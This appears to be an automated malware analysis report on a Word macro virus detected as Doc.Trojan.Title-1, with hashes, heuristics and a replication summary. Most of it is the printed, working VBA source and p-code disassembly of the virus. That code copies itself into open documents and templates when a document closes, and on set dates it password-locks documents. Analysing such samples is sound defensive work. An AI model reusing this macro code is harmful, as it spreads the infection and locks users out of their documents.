Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ba5d5522b5c2142f…

MALICIOUS

Office (OLE)

46.5 KB Created: 2025-08-01 10:49:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-19
MD5: 15c5c81c29b935b5fbcb139dddcc5b90 SHA-1: 6e00c103cbebb596d7e08f45929faabc0aa3af55 SHA-256: ba5d5522b5c2142fac927273e2b1188de52cbd92fddafa672cf18fc30bba3fd2
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the macros attempt to self-replicate by writing their code into other documents. This behavior is characteristic of macro-based malware designed for propagation. No specific family could be identified, but the replication mechanism is a key indicator of malicious intent.

Heuristics 3

  • ClamAV: Doc.Trojan.Title-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Title-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
                        currcomp.CodeModule.AddFromString thecode.lines(mystart, mylines)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9226 bytes
SHA-256: 0c649edc63425f8d90aac31eabebcfd5703ab0007a65f97d4b776d5a681a9836
Detection
ClamAV: Doc.Trojan.Title-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
    If Left(Me.BuiltInDocumentProperties("Title"), 1) = "?" Then
        Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
        Exit Sub
    End If
    Me.BuiltInDocumentProperties("Title") = "?" & Me.BuiltInDocumentProperties("Title")
    Dim currdoc As Document
    Dim thecode As Object
    Dim currcomp As Object
    Set thecode = Me.VBProject.VBComponents.Item(Me.CodeName).CodeModule
    Dim lines As Integer, mystart As Integer
    mystart = thecode.ProcBodyLine("Document_Close", vbext_pk_Proc)
    mylines = thecode.ProcCountLines("Document_Close", vbext_pk_Proc) - mystart + 1
    Dim savy As Boolean
   ' Options.VirusProtection =
    For Each currdoc In Documents
        savy = currdoc.Saved
        If currdoc.SaveFormat = wdFormatDocument Or currdoc.SaveFormat = wdFormatTemplate Then
            Set currcomp = currdoc.VBProject.VBComponents.Item(1)
            If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
                If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
                    currcomp.CodeModule.AddFromString thecode.lines(mystart, mylines)
                Else
                    currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, thecode.lines(mystart + 1, mylines - 2)
                End If
                If savy Then currdoc.Save
            End If
            If (Day(Now()) = 30 And Month(Now()) = 7) Or (Day(Now()) = 20 And Month(Now()) = 6) Or (Day(Now()) = 3 And Month(Now()) = 5) Then
                currdoc.WritePassword = Str(Int(Rnd() * 10) - 1)
                If savy Then currdoc.Save
            End If

        End If
    Next currdoc
    Dim currtemp As Template
    Dim code As String
    For Each currtemp In Templates
        savy = currtemp.Saved
        Set currcomp = currtemp.VBProject.VBComponents.Item(1)
        If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
            If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
                code = thecode.lines(mystart, mylines)
                currcomp.CodeModule.AddFromString code
            Else
                code = thecode.lines(mystart + 1, mylines - 2)
                currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, code
            End If
            If savy Then currtemp.Save
         End If
    Next currtemp
    Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
End Sub


' Processing file: /opt/analyzer/scan_staging/b36685d991c748b78c94c80c417b6216.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8729 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0001 "?"
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemSt BuiltInDocumentProperties 0x0001 
' Line #4:
' 	ExitSub 
' Line #5:
' 	EndIfBlock 
' Line #6:
' 	LitStr 0x0001 "?"
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	Concat 
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemSt BuiltInDocumentProperties 0x0001 
' Line #7:
' 	Dim 
' 	VarDefn currdoc (As Document)
' Line #8:
' 	Dim 
' 	VarDefn thecode (As Object)
' Line #9:
' 	Dim 
' 	VarDefn currcomp (As Object)
' Line #10:
' 	SetStmt 
' 	Ld id_FFFF 
' 	MemLd CodeName 
' 	Ld id_FFFF 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set thecode 
' Line #11:
' 	Dim 
' 	VarDefn lines (As Integer)
' 	VarDefn mystart (As Integer)
' Line #12:
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld thecode 
' 	ArgsMemLd ProcBodyLine 0x0002 
' 	St mystart 
' Line #13:
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld thecode 
' 	ArgsMemLd ProcCountLines 0x0002 
' 	Ld mystart 
' 	Sub 
' 	LitDI2 0x0001 
' 	Add 
' 	St mylines 
' Line #14:
' 	Dim 
' 	VarDefn savy (As Boolean)
' Line #15:
' 	QuoteRem 0x0003 0x001A " Options.VirusProtection ="
' Line #16:
' 	StartForVariable 
' 	Ld currdoc 
' 	EndForVariable 
' 	Ld Documents 
' 	ForEach 
' Line #17:
' 	Ld currdoc 
' 	MemLd Saved 
' 	St savy 
' Line #18:
' 	Ld currdoc 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld currdoc 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #19:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld currdoc 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set currcomp 
' Line #20:
' 	LitStr 0x0009 "wsxzaqedc"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0005 
' 	Not 
' 	IfBlock 
' Line #21:
' 	LitStr 0x000E "Document_Close"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0005 
' 	Not 
' 	IfBlock 
' Line #22:
' 	Ld mystart 
' 	Ld mylines 
' 	Ld thecode 
' 	ArgsMemLd lines 0x0002 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #23:
' 	ElseBlock 
' Line #24:
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemLd ProcBodyLine 0x0002 
' 	LitDI2 0x0001 
' 	Add 
' 	Ld mystart 
' 	LitDI2 0x0001 
' 	Add 
' 	Ld mylines 
' 	LitDI2 0x0002 
' 	Sub 
' 	Ld thecode 
' 	ArgsMemLd lines 0x0002 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #25:
' 	EndIfBlock 
' Line #26:
' 	Ld savy 
' 	If 
' 	BoSImplicit 
' 	Ld currdoc 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #27:
' 	EndIfBlock 
' Line #28:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x001E 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x0007 
' 	Eq 
' 	And 
' 	Paren 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0014 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x0006 
' 	Eq 
' 	And 
' 	Paren 
' 	Or 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0003 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x0005 
' 	Eq 
' 	And 
' 	Paren 
' 	Or 
' 	IfBlock 
' Line #29:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd Str 0x0001 
' 	Ld currdoc 
' 	MemSt WritePassword 
' Line #30:
' 	Ld savy 
' 	If 
' 	BoSImplicit 
' 	Ld currdoc 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #31:
' 	EndIfBlock 
' Line #32:
' Line #33:
' 	EndIfBlock 
' Line #34:
' 	StartForVariable 
' 	Ld currdoc 
' 	EndForVariable 
' 	NextVar 
' Line #35:
' 	Dim 
' 	VarDefn currtemp (As Template)
' Line #36:
' 	Dim 
' 	VarDefn code (As String)
' Line #37:
' 	StartForVariable 
' 	Ld currtemp 
' 	EndForVariable 
' 	Ld Templates 
' 	ForEach 
' Line #38:
' 	Ld currtemp 
' 	MemLd Saved 
' 	St savy 
' Line #39:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld currtemp 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set currcomp 
' Line #40:
' 	LitStr 0x0009 "wsxzaqedc"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0005 
' 	Not 
' 	IfBlock 
' Line #41:
' 	LitStr 0x000E "Document_Close"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0005 
' 	Not 
' 	IfBlock 
' Line #42:
' 	Ld mystart 
' 	Ld mylines 
' 	Ld thecode 
' 	ArgsMemLd lines 0x0002 
' 	St code 
' Line #43:
' 	Ld code 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #44:
' 	ElseBlock 
' Line #45:
' 	Ld mystart 
' 	LitDI2 0x0001 
' 	Add 
' 	Ld mylines 
' 	LitDI2 0x0002 
' 	Sub 
' 	Ld thecode 
' 	ArgsMemLd lines 0x0002 
' 	St code 
' Line #46:
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemLd ProcBodyLine 0x0002 
' 	LitDI2 0x0001 
' 	Add 
' 	Ld code 
' 	Ld currcomp 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #47:
' 	EndIfBlock 
' Line #48:
' 	Ld savy 
' 	If 
' 	BoSImplicit 
' 	Ld currtemp 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #49:
' 	EndIfBlock 
' Line #50:
' 	StartForVariable 
' 	Ld currtemp 
' 	EndForVariable 
' 	NextVar 
' Line #51:
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemSt BuiltInDocumentProperties 0x0001 
' Line #52:
' 	EndSub 
' Line #53: